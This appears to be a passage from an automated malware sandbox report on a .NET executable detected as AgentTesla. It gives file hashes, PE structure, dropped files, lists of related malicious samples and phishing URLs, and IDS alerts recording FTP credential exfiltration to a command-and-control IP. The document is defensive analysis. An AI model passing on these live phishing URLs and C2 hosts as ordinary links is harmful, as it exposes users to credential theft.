	https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330	Get hash	malicious	Unknown	Browse	172.64.41.3
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
UNIFIEDLAYER-AS-1US	RHOqJ5BrHW.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	28uMwHvbTD.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	108.179.241.236
	e4Iw3lwFJ5.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	192.185.57.31
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	secured File__esperion.com.html	Get hash	malicious	Phisher	Browse	162.241.149.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.12.205
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.26.12.205
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\iNFGd6bDZX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:tLHyIFKL3IZ2KRH9Oug4Xs
MD5:	5761D171AE60BBDB848243C153814C7F
SHA1:	A81742F8C18F1C15061E3E19E1FF5223AF21E65D
SHA-256:	09B1E175BF93ED897EC6F347AD7AE4D30B1D8EC6C4A3585620D1F4A8DCA126DA
SHA-512:	2D6021A2430E6DA8021794EF8CB471D7D9DCFAD31F35F644C82BEA7EBF534D57EF6BC47A8725CD67FC593E6FF4E18094D7BF9F4FCCB07665E60121646F61ACFA
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21evn0oi.nz3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mv4gxzg.rzl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3ejjsr4.cvs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmvkwl2i.opo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\newapp\newapp.exe

Download File

Process:	C:\Users\user\Desktop\iNFGd6bDZX.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	927232
Entropy (8bit):	7.663336014408318
Encrypted:	false
SSDEEP:	24576:1CIee0JW/voReSPECqUYIu6HzxY27/c913X39:IBexvoReSnJu6HzxY2DC1H39
MD5:	8FBFFB8434E574EA1BB6865DA7AF4C8D
SHA1:	557BAC80418049B3C97821A2B60BB3928211A644
SHA-256:	9802175DC78CEF260413C05623704F267EAA8184D8D6BCB68E15E82DE4EE696E
SHA-512:	63C897DCA939E97E142B95D692B3EA22D46178CEE470CAFCEAAE797226DDEAEC5D6DDBB06346C946700F1860EC4EDE17A03C37E3357E4848E2DC936A192E0FA8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.Ng..............0.................. ........@.. ....................................@.................................8...S............................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc.......`.......$..............@..B................p.......H.......................H...X...........................................DQ..MN......R.........~...R.y_..........1~............5....8..Y...Jk.....aHK..v-..&.\|"_SD}!...6./.=.\|.....T7K.......p.C./.x.z...).....4....`..c....l....Z..P.-k...g.....9.....,....F.y...&-...w.6...f.p.....?..".<..p.A...zV t#..Z.(x.a.q.......V....C<..X..._9.,3s..H.j;...F..H.....]...o..S..A"D..$D.....d.x...B.A...+.T7..BTW.H...5;.3........S?C.c.N3`~).K...$D.....d.0..........(....*...0..

C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\iNFGd6bDZX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.663336014408318
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	iNFGd6bDZX.exe
File size:	927'232 bytes
MD5:	8fbffb8434e574ea1bb6865da7af4c8d
SHA1:	557bac80418049b3c97821a2b60bb3928211a644
SHA256:	9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e
SHA512:	63c897dca939e97e142b95d692b3ea22d46178cee470cafceaae797226ddeaec5d6ddbb06346c946700f1860ec4ede17a03c37e3357e4848e2dc936a192e0fa8
SSDEEP:	24576:1CIee0JW/voReSPECqUYIu6HzxY27/c913X39:IBexvoReSnJu6HzxY2DC1H39
TLSH:	B715F19C3A01F44FC942C9354D71EDB8A6586CBB9B069203D6DB3DEFB92DD468E101A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.Ng..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	333333ab693b9b98

Static PE Info

General

Entrypoint:	0x4ba78e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x674ED06B [Tue Dec 3 09:33:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba738	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x299b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb8794	0xb8800	e3406a5cd503e4c10735cf7c8ee52a0d	False	0.9046713562838753	data	7.759793629264103	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x299b8	0x29a00	10ea48019cf6b645fb74f68baf5dec3b	False	0.6765906531531531	data	7.091189868949569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe6000	0xc	0x200	0bfb83ba7ce633057f0e29455651fb71	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbc250	0x10d8b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9989130907351854
RT_ICON	0xccfdc	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.42335561339169525
RT_ICON	0xdd804	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.5058455361360416
RT_ICON	0xe1a2c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.5346473029045643
RT_ICON	0xe3fd4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.6055347091932458
RT_ICON	0xe507c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7225177304964538
RT_GROUP_ICON	0xe54e4	0x5a	Targa image data - Map 65536 x 3467 x 1	0.7333333333333333
RT_GROUP_ICON	0xe5540	0x14	data	1.05
RT_VERSION	0xe5554	0x278	data	0.46835443037974683
RT_MANIFEST	0xe57cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:21:16.078441+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49741	192.254.225.136	21	TCP
2025-01-11T04:21:16.551813+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49744	192.254.225.136	42249	TCP
2025-01-11T04:21:16.559832+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49744	192.254.225.136	42249	TCP
2025-01-11T04:21:23.851673+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49752	192.254.225.136	21	TCP
2025-01-11T04:21:24.331495+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49753	192.254.225.136	47402	TCP
2025-01-11T04:21:24.336767+0100	1800009	Joe Security MALWARE AgentTesla - FTP Exfil Passwords	1	192.168.2.4	49753	192.254.225.136	47402	TCP
2025-01-11T04:21:24.336767+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49753	192.254.225.136	47402	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:21:01.571227074 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:01.571276903 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:01.571403027 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:01.595890999 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:01.595931053 CET	443	49732	104.26.12.205	192.168.2.4
